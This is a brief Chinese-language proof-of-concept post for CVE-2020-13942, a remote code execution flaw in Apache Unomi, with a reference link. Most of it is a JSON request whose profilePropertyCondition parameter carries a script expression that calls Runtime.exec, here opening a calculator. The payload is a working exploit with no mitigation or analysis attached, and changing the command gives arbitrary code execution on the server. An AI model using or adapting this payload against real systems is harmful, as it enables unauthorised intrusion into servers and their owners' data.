CVE-2020-13942 Apache Unomi 远程代码执行

PoC：

{"filters":[{"id" : "pyn3rd","filters": [{"condition": {"parameterValues": {"pyn3rd": "script::Runtime.getRuntime().exec('open -a Calculator')"},"type":"profilePropertyCondition"}}]}],"sessionId": "pyn3rd"}

ref：

https://twitter.com/pyn3rd/status/1328920545442680837